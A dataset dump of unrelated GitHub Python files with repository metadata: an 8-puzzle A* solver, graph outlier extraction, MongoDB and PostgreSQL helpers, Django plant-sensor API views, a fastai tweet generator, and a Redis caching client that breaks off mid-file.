[4,5,6],\r\n [7,8,0]\r\n]\r\n\r\ndef print_heap():\r\n for i in range(len(heap)):\r\n val = heap[i]\r\n #[val1,i-1,j,2,lvl+1,min_dit]\r\n print(\"LEVEL : \",val[4])\r\n print(\"manhattan : \",val[0])\r\n print(\"i j : \",val[1],val[2])\r\n print(\"cannot move to : \",val[3])\r\n print_arr(val[5])\r\n\r\ndef print_arr(dit):\r\n arr = [[0 for i in range(3)] for j in range(3)]\r\n print()\r\n for i in range(9):\r\n arr[dit[i][0]][dit[i][1]] = i\r\n \r\n for row in arr:\r\n print(row)\r\n \r\n print()\r\n \r\ndef printA():\r\n print()\r\n for row in arr:\r\n print(row)\r\n print()\r\n\r\ndef manhattan(dit2):\r\n ans = 0\r\n dit1 = {1:[0,0],2:[0,1],3:[0,2],4:[1,0],5:[1,1],6:[1,2],7:[2,0],8:[2,1],0:[2,2]}\r\n print(dit2)\r\n for i in range(9):\r\n val1 = abs(dit1[i][0]-dit2[i][0])\r\n val2 = abs(dit1[i][1]-dit2[i][1])\r\n ans+=val1+val2\r\n return ans\r\n\r\ndef build_arr(dit):\r\n arr = [[0 for i in range(3)] for j in range(3)]\r\n for i in range(9):\r\n arr[dit[i][0]][dit[i][1]] = i\r\n return arr\r\n\r\ndef all_move(i,j,prev_move,lvl,dit):\r\n if(i-1>=0 and prev_move!=1):\r\n dit[arr[i][j]],dit[arr[i-1][j]] = dit[arr[i-1][j]],dit[arr[i][j]]\r\n Arr = build_arr(dit)\r\n val1 = manhattan(dit) + 1 +lvl\r\n min_dit = dit.copy()\r\n build_arr(dit)\r\n #h_val,lvl,random_num,i,j,prev_move,dit,arr.copy()\r\n heapq.heappush(heap,[val1,lvl+1,random.randint(0,1000),i-1,j,2,min_dit,Arr])\r\n dit[arr[i][j]],dit[arr[i-1][j]] = dit[arr[i-1][j]],dit[arr[i][j]]\r\n \r\n if(i+1<=2 and prev_move!=2):\r\n dit[arr[i][j]],dit[arr[i+1][j]] = dit[arr[i+1][j]],dit[arr[i][j]]\r\n Arr = build_arr(dit)\r\n val2 = manhattan(dit)+ 1 + lvl\r\n min_dit = dit.copy()\r\n heapq.heappush(heap,[val2,lvl+1,random.randint(0,1000),i+1,j,1,min_dit,Arr])\r\n dit[arr[i][j]],dit[arr[i+1][j]] = dit[arr[i+1][j]],dit[arr[i][j]]\r\n \r\n if(j-1>=0 and prev_move!=3):\r\n dit[arr[i][j]],dit[arr[i][j-1]] = dit[arr[i][j-1]],dit[arr[i][j]]\r\n Arr = build_arr(dit)\r\n val3 = manhattan(dit)+ 1 + lvl\r\n min_dit = dit.copy()\r\n heapq.heappush(heap,[val3,lvl+1,random.randint(0,1000),i,j-1,4,min_dit,Arr])\r\n dit[arr[i][j]],dit[arr[i][j-1]] = dit[arr[i][j-1]],dit[arr[i][j]]\r\n \r\n if(j+1<=2 and prev_move!=4):\r\n dit[arr[i][j]],dit[arr[i][j+1]] = dit[arr[i][j+1]],dit[arr[i][j]]\r\n Arr = build_arr(dit)\r\n val4 = manhattan(dit)+ 1 + lvl\r\n min_dit = dit.copy()\r\n heapq.heappush(heap,[val4,lvl+1,random.randint(0,1000),i,j+1,3,min_dit,Arr])\r\n dit[arr[i][j]],dit[arr[i][j+1]] = dit[arr[i][j+1]],dit[arr[i][j]]\r\n\r\ndit = {}\r\n\r\nfor i in range(len(arr)):\r\n for j in range(len(arr[0])):\r\n dit[arr[i][j]] = [i,j]\r\n \r\ni = 1\r\nj = 1\r\n\r\nprev_move = -1\r\nprint(dit)\r\nh_val = manhattan(dit)\r\nlvl = 1\r\nrandom_num = random.randint(0,1000)\r\n\r\nheapq.heappush(heap,[h_val,lvl,random_num,i,j,prev_move,dit,arr.copy()])\r\nmoves = 1000\r\n\r\nwhile heap and moves>0:\r\n moves-=1\r\n\r\n ele = heapq.heappop(heap)\r\n i = ele[3]\r\n j = ele[4]\r\n arr = ele[-1]\r\n print(\"I J : \",i,j)\r\n printA()\r\n print(\"MAN : \",ele[0])\r\n print()\r\n prev_move = ele[5]\r\n lvl = ele[1]\r\n dit = ele[6]\r\n\r\n if(arr==Final_ans):\r\n print(\"FOUND SOLN!!!\")\r\n break\r\n\r\n all_move(i,j,prev_move,lvl,dit.copy())\r\n","repo_name":"suganth14/AI","sub_path":"8puzzlea.py","file_name":"8puzzlea.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"73489794973","text":"import os\nimport csv\nimport networkx as nx\nimport random\nimport numpy as np\n\n# star threshold 1\n# The threshold is represented by the mean of degrees\ndef starThreshold_1(G):\n degree_total = 0\n for x in G.nodes():\n degree_total = degree_total + G.degree(x)\n threshold = degree_total / len(G)\n return(threshold)\n\n\n# star threshold\n# The threshold is represented by the percentile of degrees\ndef starThreshold_2(G, s=2):\n G_degree = nx.degree(G)\n lst = []\n for i in G_degree:\n lst.append(i[1])\n threshold = np.percentile(lst, [25, 50, 75])\n return(threshold[s])\n\n\ndef Extract_Global_High_Neighbor(G, heigh_neighbour, anomaly_total):\n '''\n :param G: original graph\n :param heigh_neighbour: the first x heigh degree nodes\n :return: G with label 1 (Global_High_Neighbor)\n '''\n nodes_num = round(heigh_neighbour * len(G))\n node_degree = [[n, d] for n, d in G.degree()]\n\n sort_node_degree = sorted(node_degree, key=lambda tup: tup[1], reverse=True)[:nodes_num]\n # sorted\n hubs = []\n\n for i in sort_node_degree:\n hubs.append(i[0])\n\n anomaly_total['global'] = []\n for node in hubs:\n G.node[node]['global'] = 1\n anomaly_total['global'].append(node)\n\n\n\n# Extract the star structure in the graph\ndef Extract_Star(G, threshold, anomaly_total):\n '''\n :param G: original graph\n :return: G with label 1 (Star)\n '''\n\n # find star\n star_num = {}\n star_threshold = threshold\n flag = 0\n node_sort = sorted(list(G.nodes()))\n for node in node_sort:\n # find nodes's neighbor\n node_neighbor = list(G.neighbors(node))\n if len(node_neighbor) > star_threshold:\n for node1 in node_neighbor:\n flag = 1\n node1_neighbor = list(G.neighbors(node1))\n\n list1 = list(set(node_neighbor) & set(node1_neighbor))\n\n if len(list1) != 0:\n flag = 0\n break\n if flag == 1:\n star_num[node] = len(node_neighbor)\n else:\n continue\n\n star_num = sorted(star_num.items(), key=lambda x: x[1], reverse=True)\n star = []\n\n for u, v in star_num:\n star.append(u)\n\n anomaly_total['star'] = []\n if star:\n for node in star:\n G.node[node]['star'] = 1\n anomaly_total['star'].append(node)\n\n\n# load graph to networkx\ndef loadData(path1, path2, isDirect):\n\n # add nodes\n f = open(path1, \"r\")\n reader1 = csv.reader(f)\n nodes = []\n # for item in reader1:\n # if int(item[1]) == 2:\n # nodes.append(int(item[0]))\n for item in reader1:\n nodes.append(int(item[0]))\n f.close()\n if isDirect:\n G = nx.DiGraph()\n else:\n G = nx.Graph()\n G.add_nodes_from(nodes)\n\n # add edges\n f = open(path2, \"r\")\n reader1 = csv.reader(f)\n edges = []\n # for item in reader1:\n # if int(item[2]) == 2:\n # edges.append([int(item[0]), int(item[1])])\n for item in reader1:\n edges.append([int(item[0]), int(item[1])])\n f.close()\n G.add_edges_from(edges)\n return (G)\n\n\n# data processing\ndef dataTest():\n # path1 = \"starmatrix/toycase10_node.csv\"\n # path2 = \"starmatrix/toycase10_edge.csv\"\n\n path1 = \"../GraphSampling/formalData/as_node.csv\"\n path2 = \"../GraphSampling/formalData/as_edge.csv\"\n\n\n file = os.path.splitext(path1)\n filename, type = file\n a = filename.split('/')\n b = a[-1].split('_')\n fn = b[0]\n\n isDirect = False\n G = loadData(path1, path2, isDirect)\n\n # origin graph\n threshold = starThreshold_2(G)\n heigh_neighbour = 0.05\n anomaly_total1 = {}\n Extract_Global_High_Neighbor(G, heigh_neighbour, anomaly_total1)\n Extract_Star(G, threshold, anomaly_total1)\n\n print('node:', len(G))\n print('edge:', nx.number_of_edges(G))\n print(anomaly_total1)\n print(len(anomaly_total1['global']))\n print(len(anomaly_total1['star']))\n\n\n\nif __name__ == '__main__':\n dataTest()","repo_name":"HawkinYap/GraphAnalysis","sub_path":"OtherAlgorithm/extract_outlier_in_graph.py","file_name":"extract_outlier_in_graph.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"71798566496","text":"from pymongo import MongoClient\nimport logging\nimport traceback\nimport gridfs\nfrom fastapi import HTTPException\nimport os\n\nLOG_FILENAME = 'app_logs.log'\n\nlogging.basicConfig(filename=LOG_FILENAME, level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\n\ndef mongodb_connection():\n try:\n mongodb_uri = os.environ['MONGO_CONNECTION_STRING'] \n # mongodb_uri = 'mongodb://localhost:27017/'\n mongodb = MongoClient(mongodb_uri)\n mongodb.server_info()\n return mongodb\n except KeyError:\n logging.error(\"error occured connecting to database\")\n raise HTTPException(status_code=500, detail=\"error occured connecting to database\")\n except Exception as e:\n logging.error(\"Unable to connect to MongoDB\")\n logging.error(traceback.format_exc())\n raise e\n\ndef get_users_collections_and_fs():\n mongodb = mongodb_connection()\n try:\n db_name = os.environ['DB_NAME'] \n collection_name = os.environ['COLLECTION_NAME']\n # db_name = 'oneable_user_monitoring_database'\n # collection_name = 'users'\n db = mongodb[db_name]\n \n if db_name not in mongodb.list_database_names():\n raise ValueError('Database not found')\n \n users_collection = db[collection_name]\n print(users_collection)\n fs = gridfs.GridFS(db)\n return users_collection, fs\n except KeyError as ke:\n logging.error(f\"Environment variable {ke} is not set\")\n raise HTTPException(status_code=500, detail=f\"{ke} not set\")\n except ValueError as ve:\n logging.error(ve)\n logging.error(traceback.format_exc())\n raise HTTPException(status_code=500, detail=\"Database not found.\")\n except Exception as e:\n logging.error(f\"An error occurred: {str(e)}\")\n logging.error(traceback.format_exc())\n raise HTTPException(status_code=500, detail=\"An unexpected error occurred.\")\n","repo_name":"Ravindrareddygontu/myprojectfiles","sub_path":"FaceRecognitionPythonServerSideCode/mongo_client.py","file_name":"mongo_client.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"34186753402","text":"from datetime import datetime\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import generics\nfrom rest_framework.decorators import api_view, authentication_classes\nfrom rest_framework.response import Response\nfrom django.shortcuts import get_object_or_404\nfrom .serializers import PlantSerializer, DataTableSerializer\nfrom Core.models import Plant, DataTable\nfrom Core.models import Plant\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authentication import SessionAuthentication\n\n\n\n# Create your views here.\nclass PlantListCreateView(generics.ListCreateAPIView):\n queryset = Plant.objects.all()\n serializer_class = PlantSerializer\n # authentication_classes = [TokenAuthentication]\n # permission_classes = [IsAuthenticated]\n\n\nclass DataTableListCreateView(generics.ListCreateAPIView):\n queryset = DataTable.objects.all()\n serializer_class = DataTableSerializer\n # authentication_classes = [TokenAuthentication]\n # permission_classes = [IsAuthenticated]\n\n\n# @csrf_exempt\n@api_view(['GET'])\ndef get_plant(request, plant_id):\n try:\n plant = Plant.objects.get(pk=plant_id)\n except Plant.DoesNotExist:\n return Response({'Error': 'Plant Not Found!!!'}, status=404)\n\n serializer = PlantSerializer(plant)\n return Response(serializer.data)\\\n\n@api_view(['GET'])\ndef get_all_plants(request):\n try:\n plants = Plant.objects.filter(user=request.user)\n serializer = PlantSerializer(plants, many=True)\n return JsonResponse(serializer.data, safe=False)\n except Plant.DoesNotExist:\n return Response({'Error': 'Plant Not Found!!!'}, status=404)\n\n\n@csrf_exempt\n@api_view(['POST', 'PUT'])\ndef update_plant(request, plant_id):\n if request.method == 'GET':\n return Response({'message': 'GET request received'}, status=200)\n\n try:\n plant_entry = Plant.objects.get(pk=plant_id)\n except Plant.DoesNotExist:\n return Response({'Error': 'plant not found!'}, status=404)\n\n if request.method == 'POST' or request.method == 'PUT':\n data = request.data\n data['user'] = request.user.id\n print(data)\n serializer = PlantSerializer(plant_entry, data=data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=400)\\\n\n\n\n@csrf_exempt\n@api_view(['POST', 'PUT'])\ndef update_data_table_entry(request, entry_id):\n if request.method == 'GET':\n return Response({'message': 'GET request received'}, status=200)\n\n try:\n print('UPDATE DATATABLE')\n data_entry = get_object_or_404(DataTable, uuid=entry_id)\n plant_id = request.data['plant_id']\n plant_obj = get_object_or_404(Plant, id=plant_id)\n data = request.data\n data['plant'] = plant_obj.id\n data.pop('plant_id')\n print(data_entry, 'beannnnnns')\n print(data_entry.__dict__)\n print(data, 'THE DATA')\n if data['m_temp'] != 'None':\n data['m_temp'] = float(data.get('m_temp', None))\n else:\n data['m_temp'] = None\n if data['m_moist'] != 'None':\n data['m_moist'] = float(data.get('m_moist', None))\n else:\n data['m_moist'] = None\n if data['m_ec'] != 'None':\n data['m_ec'] = float(data.get('m_m_ec', None))\n else:\n data['m_ec'] = None\n if data['m_nitrogen'] != 'None':\n data['m_nitrogen'] = float(data.get('m_nitrogen', None))\n else:\n data['m_nitrogen'] = None\n if data['m_phosphorus'] != 'None':\n data['m_phosphorus'] = float(data.get('m_phosphorus', None))\n else:\n data['m_phosphorus'] = None\n if data['m_potassium'] != 'None':\n data['m_potassium'] = float(data.get('m_potassium', None))\n else:\n data['m_potassium'] = None\n if data['m_ph'] != 'None':\n data['m_ph'] = float(data.get('m_ph', None))\n else:\n data['m_ph'] = None\n data['date_time'] = datetime.strptime(data['date_time'], '%Y-%m-%d %H:%M:%S')\n print(data, 'daaaaaata')\n\n # {'plant_id': 2, 'uuid': 'cc09a0a8-c161-4115-8640-fe8e68e5e73a', 'm_temp': 1.0, 'm_moist': 2.0, 'm_ec': 1.0, 'm_npk': 2.0, 'm_ph': 1.0, 'date_time': datetime.datetime(2023, 10, 3, 4, 2, 15, 197382, tzinfo=datetime.timezone.utc)}\n # {'plant_id': 2, 'uuid': 'cc09a0a8-c161-4115-8640-fe8e68e5e73a', 'm_temp': '999.000000', 'm_moist': '888.000000', 'm_ec': '333.000000', 'm_npk': '123.000000', 'm_ph': '11.000000', 'date_time': '2023-09-30 20:49:03'}\n\n\n if request.method == 'POST' or request.method == 'PUT':\n serializer = DataTableSerializer(data_entry, data=data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n print(serializer.errors, 'ERRRROR')\n return Response(serializer.errors, status=400)\n except Exception as error:\n print(error, 'THIS IS AN ERROR')\n return Response({'Error': 'Data entry not found In Update Plant!!!'}, status=404)\n\n\n@csrf_exempt\n@api_view(['GET'])\ndef read_data_table_entry(request, entry_id):\n if request.method == 'GET':\n return Response({'message': 'GET request received'}, status=200)\n\n try:\n data_entry = DataTable.objects.get(pk=entry_id)\n return data_entry\n except DataTable.DoesNotExist:\n return Response({'Error': 'Data entry not found!'}, status=404)\n\n@csrf_exempt\n@api_view(['POST'])\ndef create_data_table_entry(request):\n print(request.data, 'HELLOB')\n if request.method == 'POST':\n plant_id = request.data['plant_id']\n plant_obj = get_object_or_404(Plant, id = plant_id)\n data = request.data\n print(request.data, 'ADDING', plant_obj.id)\n data['plant'] = plant_obj.id\n data.pop('plant_id')\n print(request.data, 'ADDING', plant_obj.id)\n print(type(data['m_temp']), 'MTEMPGG')\n if data['m_temp'] != 'None':\n data['m_temp'] = float(data.get('m_temp',None))\n else:\n data['m_temp'] = None\n if data['m_moist'] != 'None':\n data['m_moist'] = float(data.get('m_moist',None))\n else:\n data['m_moist'] = None\n if data['m_ec'] != 'None':\n data['m_ec'] = float(data.get('m_m_ec',None))\n else:\n data['m_ec'] = None\n if data['m_nitrogen'] != 'None':\n data['m_nitrogen'] = float(data.get('m_nitrogen',None))\n else:\n data['m_nitrogen'] = None\n if data['m_phosphorus'] != 'None':\n data['m_phosphorus'] = float(data.get('m_phosphorus',None))\n else:\n data['m_phosphorus'] = None\n if data['m_potassium'] != 'None':\n data['m_potassium'] = float(data.get('m_potassium',None))\n else:\n data['m_potassium'] = None\n if data['m_ph'] != 'None':\n data['m_ph'] = float(data.get('m_ph',None))\n else:\n data['m_ph'] = None\n data['date_time'] = datetime.strptime(data['date_time'], '%Y-%m-%d %H:%M:%S')\n\n serializer = DataTableSerializer(data=data)\n if serializer.is_valid():\n print(serializer)\n serializer.save()\n return Response(serializer.data, status=201) #201 means created succefully\n else:\n print(serializer.errors)\n return Response(serializer.errors, status=400) # 400 means some error but found\n\n\n@csrf_exempt\n@api_view(['DELETE'])\ndef del_data_table_entry(request, entry_id):\n try:\n data_entry = DataTable.objects.get(pk=entry_id)\n print(data_entry)\n except DataTable.DoesNotExist:\n return Response({'Error': 'Data entry not found!'}, status=404)\n\n if request.method == 'DELETE':\n data_entry.delete()\n return Response({'message': 'Data Entry Deleted'}, status=204)\n\n\n","repo_name":"DhananjeyanN/PlantFertalizingProject","sub_path":"PlantApi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"27572925626","text":"# pip install psycopg2\n# pip install openpyxl\nimport psycopg2\nimport pandas as pd\n\n# Создание подключения к PostgreSQL\nconn = psycopg2.connect(database = \"home\",\n host = \"212.8.247.94\",\n user = \"student\",\n password = \"qwerty\",\n port = \"5432\")\n\n# Отключение автокоммита\nconn.autocommit = False\n\n# Создание курсора\ncursor = conn.cursor()\n####################################################\n# Выполнение SQL кода в базе данных без возврата результата\ncursor.execute( \"INSERT INTO p3.testtable( id, val ) VALUES ( 3, 'GLEB' )\" )\nconn.commit()\n\n# Выполнение SQL кода в базе данных с возвратом результата\ncursor.execute( \"SELECT * FROM p3.testtable\" )\nrecords = cursor.fetchall()\nfor row in records:\n print( row )\n\n####################################################\n\n# Формирование DataFrame\nnames = [ x[0] for x in cursor.description ]\ndf = pd.DataFrame( records, columns = names )\n\n# Запись в файл\ndf.to_excel( 'pandas_out.xlsx', sheet_name='sheet1', header=True, index=False )\n\n####################################################\n# Чтение из файла\ndf = pd.read_excel( 'pandas_in.xlsx', sheet_name='sheet1', header=0, index_col=None )\n\n# Запись DataFrame в таблицу базы данных\ncursor.executemany( \"INSERT INTO p3.testtable( id, val ) VALUES( %s, %s )\", df.values.tolist() )\nconn.commit()\n# Закрываем соединение\ncursor.close()\nconn.close()\n\n","repo_name":"Kolonin-Gleb/Big-data","sub_path":"Term 5/Lesson11_python_postgress_interaction/python_postgress_interaction.py","file_name":"python_postgress_interaction.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"33384374731","text":"# Create by: Will McGrath\nimport os\nimport sys\n\nimport _pickle as cPickle\nimport numpy as np\nimport pandas as pd\nfrom fastai.text.all import AWD_LSTM, TextDataLoaders, language_model_learner\n\n\n# note: deep learning (LSTM is a RNN) using fastai\nclass TrumpifyTweet(object):\n def __init__(self):\n self.this_dir = os.path.dirname(os.path.realpath(__file__))\n data_dir = os.path.join(self.this_dir, \"../data/twitter_data_with_feats.csv\")\n self.tweets_df = pd.read_csv(data_dir, sep=\",\")\n\n def main(self, input_tweet, num_add_words):\n # set seed\n np.random.seed(1)\n\n # getting DataLoader\n dls = TextDataLoaders.from_df(\n self.tweets_df,\n path=\"../data/\",\n text_col=\"processed_content\",\n seed=3,\n valid_pct=0.3,\n is_lm=True,\n )\n\n # train model\n model_dir = os.path.join(self.this_dir, \"../models/lstm_model.pickle\")\n try:\n with open(model_dir, \"rb\") as f:\n lstm_model = cPickle.load(f)\n\n except FileNotFoundError:\n with open(model_dir, \"wb\") as f:\n # LSTM model to generate sentences\n lstm_model = language_model_learner(dls, AWD_LSTM)\n lstm_model.fit_one_cycle(5)\n cPickle.dump(lstm_model, f)\n\n # predict sentence\n pred_output = lstm_model.predict(input_tweet, num_add_words)\n\n return pred_output\n\n\nif __name__ == \"__main__\":\n input_tweet = input(\"Please enter a Tweet or text: \")\n num_add_words = int(\n input(\"Please enter the number of Trump words you would like to add: \")\n )\n sys.exit(TrumpifyTweet().main(input_tweet, num_add_words))\n","repo_name":"wpmcgrath95/TrumpTweetsSentimentAnalysis","sub_path":"python/Trumpify_Tweet.py","file_name":"Trumpify_Tweet.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"3738207708","text":"import asyncio\nimport aioredis\nimport ujson\nimport lz4.frame\nfrom conf import conf\nfrom thrift.protocol.TCompactProtocol import TCompactProtocol\nfrom thrift.transport.TTransport import TMemoryBuffer\nfrom utils import logger, log, print_excp\nfrom random import random\n\nDI_TTL = 5 * 60 if conf.IS_PROD else 60\nRECO_TTL = 7 * 24 * 3600 if conf.IS_PROD else 60\nRELATED_CARD_TTL = 0\n\n\n# noinspection PyMethodMayBeStatic\nclass RedisClient:\n def __init__(self):\n self.redis_pool = []\n self.current = -1\n self.max = len(conf.REDIS['addresses'])\n self.di_versions = {}\n self.reco_versions = {}\n\n async def prepare_conn(self):\n addresses = conf.REDIS['addresses']\n password = conf.REDIS.get('password')\n self.redis_pool = await asyncio.gather(*[\n aioredis.create_redis_pool(addresses[i], minsize=1, maxsize=1) for i in range(self.max)\n ])\n logger.info('RedisClient init done')\n\n async def close(self):\n for i in self.redis_pool:\n try:\n i.close()\n await i.wait_closed()\n except Exception as e:\n print_excp(e)\n\n async def connect(self, write=False):\n if write:\n return self.redis_pool[0]\n else:\n self.current = (self.current + 1) % self.max\n return self.redis_pool[self.current]\n\n def lucky(self):\n return random() < conf.REDIS['probability']\n\n def get_di_version(self, typ):\n return self.di_versions.get(self.di_cls_name(typ), {}).get('version', 0)\n\n def get_reco_version(self, creator):\n return self.reco_versions.get(creator.__name__, {}).get('version', 0)\n\n def cache_list(self, creator, interfaceName, id_index=None):\n version = self.get_reco_version(creator)\n\n def wrapper(f):\n async def g(*args, **kwargs):\n service = args[0]\n key = f'{interfaceName}:{version}'\n if id_index is not None:\n key = f'{key}:{args[id_index]}'\n objs = []\n\n if service is None:\n # recommend service is down, resort to redis\n try:\n redis = await self.connect()\n robjs = await redis.lrange(key, 0, -1)\n robjs = robjs or []\n for robj in robjs:\n if robj is None:\n continue\n\n obj = creator()\n mobj = TMemoryBuffer(lz4.frame.decompress(robj))\n cobj = TCompactProtocol(mobj)\n obj.read(cobj)\n objs.append(obj)\n\n logger.debug(f'[REDIS] Get list of {key} from cache')\n except Exception as e:\n log.print_excp(e)\n else:\n objs = await f(*args, **kwargs)\n # save obj to redis randomly\n if self.lucky() and objs is not None and len(objs) > 0:\n try:\n redis = await self.connect(True)\n vals = []\n for obj in objs:\n mobj = TMemoryBuffer()\n cobj = TCompactProtocol(mobj)\n obj.write(cobj)\n vals.append(lz4.frame.compress(mobj.getvalue()))\n\n if len(vals) > 0:\n tr = redis.multi_exec()\n tr.ltrim(key, 1, 0)\n tr.rpush(key, *vals)\n tr.expire(key, RECO_TTL)\n\n await tr.execute()\n logger.debug(f'[REDIS] Set list of {key} to cache')\n except Exception as e:\n log.print_excp(e)\n\n return objs\n\n return g\n\n return wrapper\n\n async def cache_set(self, f, creator, prefix, id_index, *args, **kwargs):\n capacity = 10\n service = args[0]\n version = self.get_reco_version(creator)\n key = f'{prefix}:{version}'\n if id_index is not None:\n key = f'{key}:{args[id_index]}'\n obj = None\n\n if service is None:\n # recommend service is down, fetch one from redis randomly\n try:\n redis = await self.connect()\n robj = await redis.srandmember(key)\n if robj is not None:\n obj = creator()\n mobj = TMemoryBuffer(lz4.frame.decompress(robj))\n cobj = TCompactProtocol(mobj)\n obj.read(cobj)\n\n logger.debug(f'[REDIS] Get Response obj of {key} from cache')\n except Exception as e:\n log.print_excp(e)\n else:\n obj = await f(*args, **kwargs)\n\n # save obj to redis randomly\n if self.lucky() and obj is not None:\n try:\n redis = await self.connect(True)\n # del some randomly when total number is more than {capacity}\n total = await redis.scard(key)\n if total > capacity * 1.25:\n await redis.execute('spop', key, int(total - capacity * 0.75))\n else:\n tr = redis.multi_exec()\n mobj = TMemoryBuffer()\n cobj = TCompactProtocol(mobj)\n obj.write(cobj)\n tr.sadd(key, lz4.frame.compress(mobj.getvalue()))\n tr.expire(key, RECO_TTL)\n await tr.execute()\n logger.debug(f'[REDIS] Set Response obj of {key} to cache')\n except Exception as e:\n log.print_excp(e)\n\n return obj\n\n def cache_tabs(self, interfaceName, id_index):\n def wrapper(f):\n async def fn(*args, **kwargs):\n objs = await f(*args, **kwargs)\n return objs[0] if len(objs) > 0 else None\n\n async def g(*args, **kwargs):\n obj = await self.cache_set(fn, recttypes.Tabs, f'tab:{interfaceName}', id_index, *args, **kwargs)\n return [obj] if obj is not None else []\n\n return g\n\n return wrapper\n\n def cache_card(self, interfaceName, id_index=None):\n def wrapper(f):\n async def g(*args, **kwargs):\n return await self.cache_set(f, recttypes.Response, interfaceName, id_index, *args, **kwargs)\n\n return g\n\n return wrapper\n\n async def get_details_from_cache(self, idts, prefix):\n obj = dittypes.DIResponse(typeList=[idt.type for idt in idts])\n idts_left = None\n try:\n # 先从Redis拿数据\n redis = await self.connect()\n idts_left = []\n\n for idt in idts:\n typ = idt.type\n ids = idt.ids\n\n version = self.get_di_version(typ)\n key_prefix = f'{prefix}:{typ}:{version}'\n keys = [f'{key_prefix}:{i}' for i in ids]\n # 一次从多个key读取数据\n items = await redis.mget(*keys)\n logger.debug(f'[REDIS] Get {len(items)} DIResponse objs of {typ} from redis')\n\n ids = [ids[i] for i, v in enumerate(items) if v is None]\n items = [it for it in items if it is not None]\n\n if len(ids) > 0:\n idts_left.append(dittypes.IdsWithType(ids=ids, type=typ))\n\n vals = []\n for item in items:\n if item is None:\n continue\n\n # 从Redis中的二进制数据恢复成所需结构\n creator = self.di_creator(typ)\n if creator is None:\n continue\n\n val = creator()\n mval = TMemoryBuffer(lz4.frame.decompress(item))\n cval = TCompactProtocol(mval)\n val.read(cval)\n vals.append(val)\n\n self.di_setlist(obj, typ, vals)\n except Exception as e:\n log.print_excp(e)\n\n return obj, idts_left\n\n async def set_details_to_cache(self, obj_left, prefix):\n try:\n redis = await self.connect(write=True)\n\n pairs = []\n keys = []\n types = obj_left.typeList\n\n for typ in types:\n version = self.get_di_version(typ)\n key_prefix = f'{prefix}:{typ}:{version}'\n items = self.di_getlist(obj_left, typ)\n\n for it in items:\n key = f'{key_prefix}:{self.di_id(typ, it)}'\n mval = TMemoryBuffer()\n cval = TCompactProtocol(mval)\n it.write(cval)\n pairs.extend((key, lz4.frame.compress(mval.getvalue())))\n keys.append(key)\n\n # 一次性向Redis中存储多个数据\n if len(pairs) > 0:\n tr = redis.multi_exec()\n tr.mset(*pairs)\n\n for key in keys:\n tr.expire(key, DI_TTL)\n\n await tr.execute()\n logger.debug(f'[REDIS] Set {len(items)} DIResponse objs of type:{typ} to redis')\n\n except Exception as e:\n log.print_excp(e)\n\n def cache_details(self, idts_index=None, id_index=None, type_index=None): # idt means ids_with_type\n prefix = 'di'\n\n def wrapper(f):\n async def g(*args, **kwargs):\n is_group = idts_index is not None\n idts = args[idts_index] if is_group else [\n dittypes.IdsWithType(ids=[args[id_index]], type=args[type_index])]\n (obj, idts_left) = await self.get_details_from_cache(idts, prefix)\n\n if idts_left is None:\n idts_left = idts\n\n if len(idts_left) <= 0:\n return obj\n\n if is_group:\n args = [arg for arg in args]\n args[idts_index] = idts_left\n\n # 从底层服务拿数据\n obj_left = await f(*args, **kwargs)\n\n if obj_left is not None:\n await self.set_details_to_cache(obj_left, prefix)\n else:\n return obj\n\n # 合并obj和obj_left\n idts_left_map = {idt.type: idt.ids for idt in idts_left}\n for idt in idts:\n typ = idt.type\n if idts_left_map.get(typ) is None:\n continue\n\n ids = idt.ids\n items = self.di_getlist(obj, typ) or []\n left_items = self.di_getlist(obj_left, typ) or []\n\n items_map = {self.di_id(typ, it): it for it in items}\n left_items_map = {self.di_id(typ, it): it for it in left_items}\n\n merged_items = [items_map.get(id) or left_items_map.get(id) for id in ids]\n self.di_setlist(obj, typ, [it for it in merged_items if it is not None])\n\n return obj\n\n return g\n\n return wrapper\n\n def di_id(self, typ, item):\n from models.v1.resource.base_video import BaseVideo\n api_cls = self.api_cls(typ)\n if issubclass(api_cls, BaseVideo):\n res = item.BaseVideo.id\n else:\n res = item.id\n\n return res\n\n def api_cls(self, typ):\n from models.v1.request_handler import REC_TYPE_TO_CLS_BASE\n return REC_TYPE_TO_CLS_BASE.get(typ)\n\n def di_list_name(self, typ):\n api_cls = self.api_cls(typ)\n return api_cls and api_cls.DI_LIST_NAME\n\n def di_cls_name(self, typ):\n api_cls = self.api_cls(typ)\n return api_cls and api_cls.DI_CLS_NAME\n\n def di_getlist(self, di, typ):\n list_name = self.di_list_name(typ)\n return list_name and getattr(di, list_name) or []\n\n def di_setlist(self, di, typ, items):\n list_name = self.di_list_name(typ)\n if list_name:\n setattr(di, list_name, items)\n\n def di_creator(self, typ):\n cls_name = self.di_cls_name(typ)\n return cls_name and getattr(dittypes, cls_name)\n\n # def cache_related_card(self, interfaceName, id_index=-1):\n # capacity = 5\n # prefix = interfaceName\n # def wrapper(f):\n # async def g(*args, **kwargs):\n # service = args[0]\n # rid = args[id_index]\n # skey = f'{prefix}:{rid}'\n # obj = None\n\n # if service is None:\n # # service is down, fetch from redis\n # try:\n # redis = await self.connect()\n # robj = await redis.srandmember(skey)\n # obj = recttypes.Response()\n # mobj = TMemoryBuffer(robj)\n # cobj = 